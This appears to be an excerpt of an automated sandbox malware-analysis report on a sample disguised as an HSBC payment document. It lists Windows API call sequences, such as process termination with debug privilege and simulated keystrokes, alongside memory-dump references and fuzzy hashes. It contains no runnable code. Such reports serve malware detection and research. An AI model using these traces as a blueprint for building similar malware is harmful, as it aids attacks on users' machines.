                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InvalidateRect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 634782764-0
                                                                                                                                • Opcode ID: 94c04021cdf2939cf578fa0412db4c98def939fa86f78f5d177c5cee80adaf97
                                                                                                                                • Instruction ID: 676839bd8642a3bc1720085c89a87375606b5469a627059df2f0082c26e6177a
                                                                                                                                • Opcode Fuzzy Hash: 94c04021cdf2939cf578fa0412db4c98def939fa86f78f5d177c5cee80adaf97
                                                                                                                                • Instruction Fuzzy Hash: 9E51A330500254FEEBA49B64DC89FA97BA5FB87320F604321F950D61A1CF7DA990CB46
                                                                                                                                APIs
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0075C2F7
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0075C319
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0075C331
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0075C34F
                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0075C370
                                                                                                                                • DestroyIcon.USER32(00000000), ref: 0075C37F
                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0075C39C
                                                                                                                                • DestroyIcon.USER32(?), ref: 0075C3AB
                                                                                                                                  • Part of subcall function 007AA4AF: DeleteObject.GDI32(00000000), ref: 007AA4E8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2819616528-0
                                                                                                                                • Opcode ID: c0db0d8cc41d9b01ef85d31c121f87c987fe91edd7b6dd82e9f15cc5152971b7
                                                                                                                                • Instruction ID: 5abb7d6cb574173d353f640d48c56d133807d10d6477e3d125cf08263cc3a994
                                                                                                                                • Opcode Fuzzy Hash: c0db0d8cc41d9b01ef85d31c121f87c987fe91edd7b6dd82e9f15cc5152971b7
                                                                                                                                • Instruction Fuzzy Hash: 68515970600309FFDB24DF64DC45BAA3BA5EB58311F108528F942972A1DBB8ED91DB60
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0077A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0077A84C
                                                                                                                                  • Part of subcall function 0077A82C: GetCurrentThreadId.KERNEL32 ref: 0077A853
                                                                                                                                  • Part of subcall function 0077A82C: AttachThreadInput.USER32(00000000,?,00779683,?,00000001), ref: 0077A85A
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0077968E
                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007796AB
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007796AE
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007796B7
                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007796D5
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007796D8
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007796E1
                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007796F8
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007796FB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                • Opcode ID: 0f259e9bc9c42f063f41f89fae6747e2802c842141581820f1fd2cb50cb26639
                                                                                                                                • Instruction ID: 72488cd9d0e2a3e302ac17e49556b9e1783b4a61e1082deddd647cb69a360c5b
                                                                                                                                • Opcode Fuzzy Hash: 0f259e9bc9c42f063f41f89fae6747e2802c842141581820f1fd2cb50cb26639
                                                                                                                                • Instruction Fuzzy Hash: 7C11E571910618FEFA106FA0DC89F6A3B1DEB8D791F104425F344AB0E0C9F65C11DEA8
                                                                                                                                APIs
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0077853C,00000B00,?,?), ref: 0077892A
                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 00778931
                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0077853C,00000B00,?,?), ref: 00778946
                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0077853C,00000B00,?,?), ref: 0077894E
                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 00778951
                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0077853C,00000B00,?,?), ref: 00778961
                                                                                                                                • GetCurrentProcess.KERNEL32(0077853C,00000000,?,0077853C,00000B00,?,?), ref: 00778969
                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 0077896C
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00778992,00000000,00000000,00000000), ref: 00778986
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                • Opcode ID: b50a03abe7f85822c05b74d79aa88a7764e25e90931cdd5bfc26b825ff15a1bd
                                                                                                                                • Instruction ID: 232ad303df1ebb487e2a3f1416ed0ff0a7283c47de5718ad951ea7daa94757fa
                                                                                                                                • Opcode Fuzzy Hash: b50a03abe7f85822c05b74d79aa88a7764e25e90931cdd5bfc26b825ff15a1bd
                                                                                                                                • Instruction Fuzzy Hash: 2F01A8B5240308FFE660ABA5DC4DF6B3BACEB89711F418421FA05DB1A1DA749C008A25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                • API String ID: 0-572801152
                                                                                                                                • Opcode ID: e6f10b82593c69a810213a1b29adaadbe040ed22a0f72615cbf5af272061b4b7
                                                                                                                                • Instruction ID: c80a458392a9b8791421dfa18648785d91c43e57e3027f732c94b249cfb6ba8f
                                                                                                                                • Opcode Fuzzy Hash: e6f10b82593c69a810213a1b29adaadbe040ed22a0f72615cbf5af272061b4b7
                                                                                                                                • Instruction Fuzzy Hash: 38C19571A002099FEF10DFA8E884BAEB7F5FF48354F14846DEA05A7281E7789D41CB60
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0077710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?,?,00777455), ref: 00777127
                                                                                                                                  • Part of subcall function 0077710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777142
                                                                                                                                  • Part of subcall function 0077710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777150
                                                                                                                                  • Part of subcall function 0077710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?), ref: 00777160
                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00799806
                                                                                                                                • _memset.LIBCMT ref: 00799813
                                                                                                                                • _memset.LIBCMT ref: 00799956
                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00799982
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0079998D
                                                                                                                                Strings
                                                                                                                                • NULL Pointer assignment, xrefs: 007999DB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                                • Opcode ID: 04093938b713d95de507fff54fb785a095d30f5285e6b897e391739f15e4236b
                                                                                                                                • Instruction ID: 1fabe908cb52b2dfc0a02fdb85233e26fef47208d3e322dde183174fd31013a9
                                                                                                                                • Opcode Fuzzy Hash: 04093938b713d95de507fff54fb785a095d30f5285e6b897e391739f15e4236b
                                                                                                                                • Instruction Fuzzy Hash: AD912671D00229EBDF10DFA4E845ADEBBB9EF09310F10815AE519A7251DB79AA44CFA0
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007A6E24
                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007A6E38
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007A6E52
                                                                                                                                • _wcscat.LIBCMT ref: 007A6EAD
                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007A6EC4
                                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007A6EF2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                                • String ID: SysListView32
                                                                                                                                • API String ID: 307300125-78025650
                                                                                                                                • Opcode ID: 24877963418c1978908cdddfd727718d32a7e6dbffef88e508f60e113728b7f0
                                                                                                                                • Instruction ID: 2a92d9b2fc50befb1e69c81a0b8568acfc2d42113d32257bb3d4dc5d087228c1
                                                                                                                                • Opcode Fuzzy Hash: 24877963418c1978908cdddfd727718d32a7e6dbffef88e508f60e113728b7f0
                                                                                                                                • Instruction Fuzzy Hash: 0B41A171A00348EFDF219FA4CC85BEA77A8EF49350F14452AF644E7291D6799D848B60
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00783C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00783C7A
                                                                                                                                  • Part of subcall function 00783C55: Process32FirstW.KERNEL32(00000000,?), ref: 00783C88
                                                                                                                                  • Part of subcall function 00783C55: CloseHandle.KERNEL32(00000000), ref: 00783D52
                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079E9A4
                                                                                                                                • GetLastError.KERNEL32 ref: 0079E9B7
                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079E9E6
                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0079EA63
                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0079EA6E
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0079EAA3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                • Opcode ID: dd95f0274f24ff49363e81ab44b9eab365714f38d245d5272f5e897d0960376a
                                                                                                                                • Instruction ID: 2f7defb2eaa73b82a301fc63ef4a97631d133a510c3c629fcb918e07954a43f2
                                                                                                                                • Opcode Fuzzy Hash: dd95f0274f24ff49363e81ab44b9eab365714f38d245d5272f5e897d0960376a
                                                                                                                                • Instruction Fuzzy Hash: 3A419A71200200DFDF14EF64DCA9F6EBBA5AF81354F08C458F9469B2D2CB78A804CB96
                                                                                                                                APIs
                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00783033
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconLoad
                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                • Opcode ID: e6e722c78576c56a1a89b8c36a9b9649e71613e138bb107ef6e86edc9e40ea86
                                                                                                                                • Instruction ID: e279c763c35f6ece7d4a669c7bf93b4c8294e1aee640da20215f98322da9331f
                                                                                                                                • Opcode Fuzzy Hash: e6e722c78576c56a1a89b8c36a9b9649e71613e138bb107ef6e86edc9e40ea86
                                                                                                                                • Instruction Fuzzy Hash: 9D112B31388346BED714AB58DC46C6B77ACDF15720B50002BF900E6282DB7C9F5157A5
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00784312
                                                                                                                                • LoadStringW.USER32(00000000), ref: 00784319
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0078432F
                                                                                                                                • LoadStringW.USER32(00000000), ref: 00784336
                                                                                                                                • _wprintf.LIBCMT ref: 0078435C
                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0078437A
                                                                                                                                Strings
                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00784357
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                                • Opcode ID: 2530e9f3718a1a6895e1c4e6986ea06bc249e674a4697857b1695913b05def2b
                                                                                                                                • Instruction ID: ab97a246ef3e8ac7f04b378d6d0fcba70c5dad11f782dab661dae41d0a4edf90
                                                                                                                                • Opcode Fuzzy Hash: 2530e9f3718a1a6895e1c4e6986ea06bc249e674a4697857b1695913b05def2b
                                                                                                                                • Instruction Fuzzy Hash: 850162F294020CBFE751A7E0DD89EE7776CEB49300F0045A1F749E2051EA785E854B75
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 007AD47C
                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 007AD49C
                                                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007AD6D7
                                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007AD6F5
                                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007AD716
                                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 007AD735
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007AD75A
                                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 007AD77D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1211466189-0
                                                                                                                                • Opcode ID: 7fcf51f075a8b1ffeb4a6e15928e73b193d3157a81c9e53e7666e95cf80d4a85
                                                                                                                                • Instruction ID: 05f4da3d6327001c951cc9ec885558fd32ca395b7c48c21167afb0965dbe650e
                                                                                                                                • Opcode Fuzzy Hash: 7fcf51f075a8b1ffeb4a6e15928e73b193d3157a81c9e53e7666e95cf80d4a85
                                                                                                                                • Instruction Fuzzy Hash: DCB19C71500215EBDF28CF68C9C97AD7BB1BF89701F08C269EC4A9B695D738AD50CB50
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 00722ACF
                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00722B17
                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 0075C21A
                                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 0075C286
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                • Opcode ID: 5fd7eab34080901f5a75c75dfb667356506e9c66bd016af20ee513e44ccbd2a5
                                                                                                                                • Instruction ID: 87c7e7da1754d5402db779113b8117c2e5af4ee3a94fbeb1713d903604911fec
                                                                                                                                • Opcode Fuzzy Hash: 5fd7eab34080901f5a75c75dfb667356506e9c66bd016af20ee513e44ccbd2a5
                                                                                                                                • Instruction Fuzzy Hash: C241FB306047D0FEC7368B68AC8CBAA7BE2BB86310F54C42DE94746962C67DD887D710
                                                                                                                                APIs
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007870DD
                                                                                                                                  • Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
                                                                                                                                  • Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01
                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00787114
                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00787130
                                                                                                                                • _memmove.LIBCMT ref: 0078717E
                                                                                                                                • _memmove.LIBCMT ref: 0078719B
                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 007871AA
                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007871BF
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007871DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 256516436-0
                                                                                                                                • Opcode ID: b5ecceac75cc57e6b58f368b51a3aab3217e1999645204a8029f6491e7d93c6c
                                                                                                                                • Instruction ID: 8495bdd07388b48ba0881abc69a11cab502512491b0e7de6926611e39a09077c
                                                                                                                                • Opcode Fuzzy Hash: b5ecceac75cc57e6b58f368b51a3aab3217e1999645204a8029f6491e7d93c6c
                                                                                                                                • Instruction Fuzzy Hash: D9317031D00205EBCB10EFA4DC89AAEB778FF85710F1481B5E904AB246DB38DE14CBA4
                                                                                                                                APIs
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 007A61EB
                                                                                                                                • GetDC.USER32(00000000), ref: 007A61F3
